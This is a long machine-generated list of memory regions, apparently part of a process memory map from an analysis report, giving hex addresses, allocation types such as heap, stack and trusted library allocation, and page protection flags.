page execute and read and write
8910000
trusted library allocation
page execute and read and write
56E0000
trusted library allocation
page execute and read and write
5C44000
trusted library allocation
page read and write
98E0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
8B00000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6AF0000
trusted library allocation
page read and write
5C45000
trusted library allocation
page read and write
8CE0000
trusted library allocation
page read and write
4B9B000
trusted library allocation
page read and write
79B5000
trusted library allocation
page read and write
8ED4000
trusted library allocation
page read and write
50D5000
trusted library allocation
page read and write
79B0000
unkown
page read and write
FB0000
trusted library allocation
page read and write
79C0000
trusted library allocation
page read and write
7990000
unkown
page read and write
79F0000
trusted library allocation
page read and write
1156000
trusted library allocation
page execute and read and write
8B10000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
8DDE000
stack
page read and write
6B00000
trusted library allocation
page read and write
6A34000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
4ED4000
heap
page read and write
8930000
trusted library allocation
page read and write
61A0000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
1058000
heap
page read and write
5B50000
trusted library allocation
page read and write
41CA000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
69C0000
trusted library allocation
page read and write
89A0000
trusted library allocation
page read and write
295000
heap
page read and write
74FC000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
4B87000
trusted library allocation
page read and write
8BF0000
unkown
page read and write
79A0000
trusted library allocation
page read and write
6150000
trusted library allocation
page read and write
75F0000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
5570000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
71A0000
direct allocation
page read and write
6840000
trusted library allocation
page read and write
78C0000
trusted library allocation
page execute and read and write
8930000
trusted library allocation
page read and write
7970000
trusted library allocation
page read and write
1475000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
54F0000
trusted library allocation
page read and write
7AA0000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
8A20000
trusted library section
page read and write
5C2B000
trusted library allocation
page read and write
1056000
heap
page read and write
8ED0000
trusted library allocation
page read and write
5C21000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
892B000
trusted library allocation
page read and write
5220000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
531F000
stack
page read and write
6900000
trusted library allocation
page read and write
4EBC000
heap
page read and write
7930000
trusted library allocation
page read and write
61A0000
trusted library allocation
page read and write
6C61000
heap
page read and write
5100000
trusted library allocation
page read and write
8BF0000
unkown
page read and write
5C42000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
4BB6000
trusted library allocation
page read and write
FB0000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
73B4000
direct allocation
page read and write
6D40000
trusted library allocation
page read and write
87C6000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
6E90000
trusted library allocation
page read and write
FD0000
heap
page read and write
7A00000
trusted library allocation
page read and write
5C29000
trusted library allocation
page read and write
7990000
unkown
page read and write
5C3A000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
2F70000
heap
page read and write
8ED0000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
5C14000
trusted library allocation
page read and write
6E80000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
7880000
trusted library allocation
page read and write
89E6000
trusted library allocation
page read and write
8B30000
trusted library allocation
page read and write
7A2E000
unkown
page read and write
7800000
unkown
page read and write
2E5E000
stack
page read and write
5700000
trusted library allocation
page read and write
6C61000
heap
page read and write
7B90000
trusted library allocation
page read and write
1035000
heap
page read and write
5C5D000
trusted library allocation
page read and write
8A20000
trusted library allocation
page read and write
2D01000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
5C2E000
trusted library allocation
page read and write
1053000
heap
page read and write
104D000
heap
page read and write
8846000
trusted library allocation
page read and write
7990000
unkown
page read and write
6D30000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
2E78000
trusted library allocation
page read and write
79B6000
trusted library allocation
page read and write
6C61000
heap
page read and write
79F0000
unkown
page read and write
68D0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8A90000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
79F0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
29404429000
heap
page read and write
5BA0000
trusted library allocation
page read and write
40E3000
trusted library allocation
page read and write
8B40000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5C5F000
trusted library allocation
page read and write
4EC1000
heap
page read and write
5510000
unclassified section
page readonly
5C5D000
trusted library allocation
page read and write
79E0000
unkown
page read and write
5B50000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
8830000
unkown
page read and write
79A5000
trusted library allocation
page read and write
8A40000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6D80000
trusted library allocation
page read and write
8B20000
trusted library allocation
page read and write
1063000
heap
page read and write
6ED0000
stack
page readonly
5560000
trusted library allocation
page read and write
30F9000
trusted library allocation
page read and write
2FA3000
heap
page read and write
5290000
trusted library allocation
page read and write
5140000
trusted library allocation
page execute and read and write
8A20000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8B30000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
6C61000
heap
page read and write
5C5D000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
8D3F000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
8D10000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5C12000
trusted library allocation
page read and write
8B00000
trusted library allocation
page read and write
A50000
heap
page read and write
8830000
trusted library allocation
page read and write
8B10000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
6160000
trusted library allocation
page read and write
5250000
heap
page read and write
78D0000
trusted library allocation
page read and write
8D40000
trusted library allocation
page read and write
3364000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
5C5F000
trusted library allocation
page read and write
6C61000
heap
page read and write
5C5D000
trusted library allocation
page read and write
6C61000
heap
page read and write
8A90000
trusted library allocation
page read and write
8CE0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
73A0000
direct allocation
page read and write
8920000
trusted library allocation
page read and write
6C61000
heap
page read and write
73BF000
direct allocation
page read and write
2FCA000
heap
page read and write
7950000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
CF7000
stack
page read and write
6C61000
heap
page read and write
89A0000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
102E000
stack
page read and write
5C2E000
trusted library allocation
page read and write
8EA6000
trusted library allocation
page read and write
6C61000
heap
page read and write
8EC0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
12F0000
trusted library allocation
page read and write
65ED000
stack
page read and write
1490000
heap
page read and write
5B50000
trusted library allocation
page read and write
5230000
trusted library allocation
page read and write
6140000
trusted library allocation
page read and write
8881000
trusted library allocation
page read and write
8D10000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
4D43000
trusted library allocation
page read and write
5C2B000
trusted library allocation
page read and write
4443000
trusted library allocation
page execute and read and write
6D5A000
trusted library allocation
page read and write
57E0000
trusted library allocation
page read and write
71E7000
direct allocation
page read and write
6D30000
trusted library allocation
page read and write
7200000
direct allocation
page read and write
26CB000
heap
page read and write
8A47000
trusted library allocation
page read and write
5071000
trusted library allocation
page read and write
2D70000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
5C2E000
trusted library allocation
page read and write
8CD0000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
8A90000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
4DE2000
trusted library allocation
page read and write
6C00000
trusted library allocation
page read and write
6C61000
heap
page read and write
8EB0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6830000
trusted library allocation
page read and write
6820000
trusted library allocation
page read and write
8BA0000
unkown
page read and write
2F95000
heap
page read and write
5B50000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
692D000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
90E8000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8ED7000
trusted library allocation
page read and write
5C1D000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
4BE1000
trusted library allocation
page read and write
6E70000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
8835000
trusted library allocation
page read and write
5130000
trusted library allocation
page read and write
5C1F000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
910000
remote allocation
page read and write
EA2000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8D20000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
8B60000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
56FE000
stack
page read and write
7930000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8A30000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
5C37000
trusted library allocation
page read and write
6A00000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
FAE000
stack
page read and write
5220000
trusted library allocation
page read and write
4E6D000
heap
page read and write
6C61000
heap
page read and write
8A20000
trusted library allocation
page read and write
8EC0000
trusted library allocation
page read and write
4ED8000
heap
page read and write
8920000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
5C1E000
trusted library allocation
page read and write
545B000
heap
page read and write
5C53000
trusted library allocation
page read and write
116B000
trusted library allocation
page execute and read and write
8960000
trusted library allocation
page read and write
1067000
heap
page read and write
79A0000
unkown
page read and write
8A00000
unkown
page read and write
8A60000
trusted library allocation
page read and write
8970000
unkown
page read and write
6D30000
trusted library allocation
page read and write
8D65000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
585E000
stack
page read and write
8D80000
trusted library allocation
page read and write
105F000
heap
page read and write
7B90000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
687E000
stack
page read and write
8AFE000
stack
page read and write
36E000
stack
page read and write
8D50000
trusted library allocation
page read and write
8A20000
trusted library allocation
page read and write
5250000
trusted library allocation
page read and write
53D0000
heap
page read and write
8A90000
trusted library allocation
page read and write
11E0000
heap
page read and write
8D90000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
5565000
trusted library allocation
page read and write
4C80000
trusted library allocation
page read and write
8922000
trusted library allocation
page read and write
114D000
trusted library allocation
page execute and read and write
6C00000
trusted library allocation
page read and write
4D30000
trusted library allocation
page read and write
8A10000
trusted library allocation
page read and write
5227000
trusted library allocation
page read and write
994C000
stack
page read and write
5C5D000
trusted library allocation
page read and write
6C61000
heap
page read and write
6D30000
trusted library allocation
page read and write
5C37000
trusted library allocation
page read and write
8EA5000
trusted library allocation
page read and write
6D33000
trusted library allocation
page read and write
5C1D000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
6E20000
trusted library allocation
page read and write
68E0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
5439000
heap
page read and write
8B10000
trusted library allocation
page read and write
5250000
trusted library allocation
page read and write
5C27000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
1047000
heap
page read and write
6C61000
heap
page read and write
98B0000
trusted library allocation
page read and write
7320000
direct allocation
page read and write
8860000
unkown
page read and write
8ED1000
trusted library allocation
page read and write
5430000
trusted library allocation
page read and write
515E000
stack
page read and write
2E80000
trusted library allocation
page read and write
59B0000
direct allocation
page read and write
5C5D000
trusted library allocation
page read and write
872B000
trusted library allocation
page read and write
4BB3000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
71C0000
direct allocation
page read and write
8847000
trusted library allocation
page read and write
8D90000
trusted library allocation
page execute and read and write
8920000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
6920000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
5120000
trusted library allocation
page read and write
102D000
heap
page read and write
8870000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5C1A000
trusted library allocation
page read and write
4CE0000
heap
page read and write
4870000
trusted library allocation
page read and write
90F0000
trusted library allocation
page read and write
5C5F000
trusted library allocation
page read and write
98C0000
trusted library allocation
page execute and read and write
8990000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
EB2000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
6E80000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8EE0000
trusted library allocation
page read and write
90C0000
heap
page read and write
8BC0000
unkown
page read and write
2EA0000
heap
page execute and read and write
8D20000
trusted library allocation
page execute and read and write
8D20000
trusted library allocation
page read and write
8D20000
trusted library allocation
page read and write
74F1000
trusted library allocation
page read and write
5B50000
trusted library section
page read and write
8CD0000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
5700000
trusted library allocation
page execute and read and write
6D40000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
6C61000
heap
page read and write
6E2F000
trusted library allocation
page read and write
6C61000
heap
page read and write
7950000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
5C1D000
trusted library allocation
page read and write
6C61000
heap
page read and write
8E90000
unkown
page read and write
6E40000
trusted library allocation
page read and write
8AC0000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
6C61000
heap
page read and write
6EC0000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8A90000
trusted library allocation
page read and write
FB0000
remote allocation
page read and write
6EA0000
trusted library allocation
page read and write
6FC0000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
103D000
heap
page read and write
6C61000
heap
page read and write
103F000
heap
page read and write
6EA4000
trusted library allocation
page read and write
52B0000
trusted library allocation
page read and write
5C21000
trusted library allocation
page read and write
1074000
heap
page read and write
6C61000
heap
page read and write
6D30000
trusted library allocation
page read and write
6D80000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8D60000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8935000
trusted library allocation
page read and write
6E70000
trusted library allocation
page read and write
78A0000
trusted library section
page read and write
5B50000
trusted library allocation
page read and write
650000
trusted library allocation
page read and write
7522000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
527F000
stack
page read and write
5B50000
trusted library allocation
page read and write
7302000
direct allocation
page read and write
8A00000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
7930000
trusted library allocation
page read and write
53E6000
heap
page read and write
8960000
trusted library allocation
page read and write
8A40000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
4D9C000
stack
page read and write
8930000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
5B90000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
5721000
heap
page read and write
504B000
trusted library allocation
page read and write
8A60000
trusted library allocation
page read and write
8D40000
trusted library allocation
page read and write
2F73000
heap
page read and write
51BD000
stack
page read and write
6B40000
trusted library allocation
page read and write
6930000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8A80000
trusted library allocation
page read and write
69A0000
trusted library allocation
page read and write
EBB000
trusted library allocation
page execute and read and write
5B50000
trusted library allocation
page read and write
89D0000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5510000
heap
page read and write
8D30000
trusted library allocation
page read and write
493F000
stack
page read and write
6D30000
trusted library allocation
page read and write
875A000
trusted library allocation
page read and write
D00F000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
7A05000
trusted library allocation
page read and write
6C61000
heap
page read and write
7B90000
unkown
page read and write
8E40000
trusted library allocation
page read and write
79A5000
trusted library allocation
page read and write
78D0000
unkown
page read and write
6D30000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
6C61000
heap
page read and write
79A0000
trusted library allocation
page read and write
6C61000
heap
page read and write
5B50000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
6140000
unkown
page execute and read and write
68E0000
trusted library allocation
page read and write
8A40000
trusted library allocation
page read and write
79A4000
unkown
page read and write
66EE000
stack
page read and write
146D000
trusted library allocation
page read and write
6930000
trusted library allocation
page read and write
3077000
trusted library allocation
page read and write
12FD000
trusted library allocation
page execute and read and write
1050000
heap
page read and write
8A00000
trusted library allocation
page read and write
5B80000
trusted library allocation
page read and write
6D80000
unkown
page readonly
7B90000
trusted library allocation
page read and write
53C8000
heap
page read and write
8EA0000
trusted library allocation
page read and write
5C37000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
61A0000
trusted library allocation
page read and write
8B83000
trusted library allocation
page read and write
7997000
trusted library allocation
page read and write
2EE1000
trusted library allocation
page read and write
4F90000
heap
page read and write
9900000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8A50000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
F1E000
stack
page read and write
7920000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
7930000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
7A4D000
stack
page read and write
8910000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
5C32000
trusted library allocation
page read and write
5565000
trusted library allocation
page read and write
6D43000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
445D000
trusted library allocation
page execute and read and write
7A88000
stack
page read and write
8E80000
trusted library allocation
page read and write
79A0000
unkown
page read and write
89B0000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
546C000
heap
page read and write
8D60000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5C17000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
5110000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
6C61000
heap
page read and write
8745000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
6CA0000
direct allocation
page read and write
6B00000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
6C61000
heap
page read and write
792D000
trusted library allocation
page read and write
8A40000
trusted library allocation
page read and write
6E70000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
527D000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
79A5000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
89A0000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
50F0000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
8A10000
trusted library allocation
page execute and read and write
53BE000
heap
page read and write
6C61000
heap
page read and write
4ED6000
heap
page read and write
6C61000
heap
page read and write
5C1E000
trusted library allocation
page read and write
5C45000
trusted library allocation
page read and write
505D000
trusted library allocation
page read and write
8900000
trusted library allocation
page read and write
5C10000
trusted library allocation
page read and write
636E000
stack
page read and write
8840000
trusted library allocation
page read and write
8EC0000
trusted library allocation
page read and write
F6E000
stack
page read and write
8D40000
trusted library allocation
page read and write
8A20000
trusted library allocation
page read and write
5C2B000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
D030000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
B38000
heap
page read and write
7680000
trusted library allocation
page read and write
7380000
direct allocation
page read and write
78D9000
trusted library allocation
page read and write
68E0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8D50000
trusted library allocation
page read and write
6330000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
5C2E000
trusted library allocation
page read and write
5C24000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
3114000
trusted library allocation
page read and write
5565000
trusted library allocation
page read and write
78C2000
trusted library allocation
page read and write
5060000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
89C0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
7950000
trusted library allocation
page read and write
8A90000
trusted library allocation
page read and write
6C61000
heap
page read and write
5B50000
trusted library allocation
page read and write
78C0000
trusted library allocation
page read and write
6E38000
trusted library allocation
page read and write
1133000
trusted library allocation
page execute and read and write
8EA0000
trusted library allocation
page read and write
29F1000
stack
page read and write
8920000
trusted library allocation
page read and write
6C61000
heap
page read and write
89A0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8848000
trusted library allocation
page read and write
8A80000
trusted library allocation
page read and write
5350000
heap
page execute and read and write
57F5000
heap
page read and write
98B0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
106B000
heap
page read and write
8C80000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
89B0000
trusted library allocation
page read and write
1062000
heap
page read and write
8940000
trusted library allocation
page read and write
5C40000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
8D20000
trusted library allocation
page read and write
6E20000
trusted library allocation
page read and write
50D0000
trusted library allocation
page read and write
8B10000
trusted library allocation
page read and write
6C61000
heap
page read and write
5C5F000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
5C14000
trusted library allocation
page read and write
8E95000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
79A0000
unkown
page read and write
8ED0000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
7B90000
unkown
page read and write
8920000
trusted library allocation
page read and write
4CF0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5565000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
8B30000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
8D40000
trusted library allocation
page read and write
69D0000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
68CC000
trusted library allocation
page read and write
2FB8000
heap
page read and write
D1E0000
trusted library allocation
page read and write
8B10000
trusted library allocation
page read and write
5220000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
89A0000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
8BF0000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
308C000
trusted library allocation
page read and write
8847000
trusted library allocation
page read and write
FB0000
trusted library allocation
page read and write
78D0000
trusted library allocation
page read and write
53FF000
heap
page read and write
FB0000
trusted library allocation
page read and write
4980000
heap
page read and write
6D40000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
4BA5000
trusted library allocation
page read and write
8D4A000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
4AFB000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
430B000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8D23000
trusted library allocation
page read and write
105C000
heap
page read and write
6C61000
heap
page read and write
89C0000
unkown
page read and write
7A00000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
6C61000
heap
page read and write
8CE0000
unkown
page read and write
53E4000
heap
page read and write
6D40000
trusted library allocation
page read and write
53FE000
heap
page read and write
5710000
heap
page execute and read and write
8A00000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
9138000
trusted library allocation
page read and write
7990000
unkown
page read and write
1055000
heap
page read and write
8A70000
trusted library allocation
page read and write
4750000
trusted library allocation
page read and write
4E3E000
stack
page read and write
98E0000
trusted library allocation
page read and write
6C61000
heap
page read and write
8CE5000
trusted library allocation
page read and write
8A60000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
6D60000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
4D80000
remote allocation
page read and write
7B94000
trusted library allocation
page read and write
5950000
direct allocation
page read and write
56F0000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
E8D000
trusted library allocation
page execute and read and write
103F000
heap
page read and write
68F0000
trusted library allocation
page read and write
8A30000
trusted library allocation
page read and write
6EB0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6160000
trusted library allocation
page read and write
8EC0000
trusted library allocation
page read and write
5C4C000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
4450000
trusted library allocation
page read and write
7675000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
6C61000
heap
page read and write
5560000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
8CA0000
unkown
page read and write
8830000
trusted library allocation
page read and write
4E20000
heap
page read and write
5C22000
trusted library allocation
page read and write
8D50000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
D20E000
stack
page read and write
8CC0000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
C2C000
stack
page read and write
6D30000
trusted library allocation
page read and write
F38000
trusted library allocation
page read and write
6D60000
trusted library allocation
page read and write
68D0000
trusted library allocation
page read and write
8ED5000
trusted library allocation
page read and write
8F60000
remote allocation
page read and write
5210000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
B2D000
stack
page read and write
6C61000
heap
page read and write
1330000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
1056000
heap
page read and write
8EA0000
trusted library allocation
page read and write
2F7D000
heap
page read and write
8D50000
trusted library allocation
page read and write
13F3000
heap
page read and write
8930000
trusted library allocation
page read and write
159F000
stack
page read and write
79E5000
unkown
page read and write
8A00000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
6EB0000
trusted library allocation
page read and write
8950000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5860000
heap
page read and write
5C24000
trusted library allocation
page read and write
5C5E000
trusted library allocation
page read and write
1035000
heap
page read and write
8D30000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
7930000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
537D000
heap
page read and write
5C28000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
4E9A000
heap
page read and write
8D80000
unkown
page read and write
C30000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
1180000
trusted library allocation
page read and write
61A1000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
13CF000
stack
page read and write
5C44000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
8E30000
trusted library allocation
page read and write
544A000
heap
page read and write
53C4000
heap
page read and write
54E0000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
6EC0000
trusted library allocation
page read and write
6EB0000
trusted library allocation
page read and write
8900000
trusted library allocation
page read and write
7A90000
trusted library allocation
page read and write
6C61000
heap
page read and write
8D70000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
6850000
trusted library allocation
page read and write
6D20000
direct allocation
page read and write
7A00000
unkown
page read and write
6D40000
trusted library allocation
page read and write
FB0000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
98B0000
trusted library section
page read and write
5C1F000
trusted library allocation
page read and write
8784000
trusted library allocation
page read and write
5240000
trusted library allocation
page read and write
6EB0000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
8A50000
trusted library allocation
page read and write
4A86000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
2774000
heap
page read and write
8859000
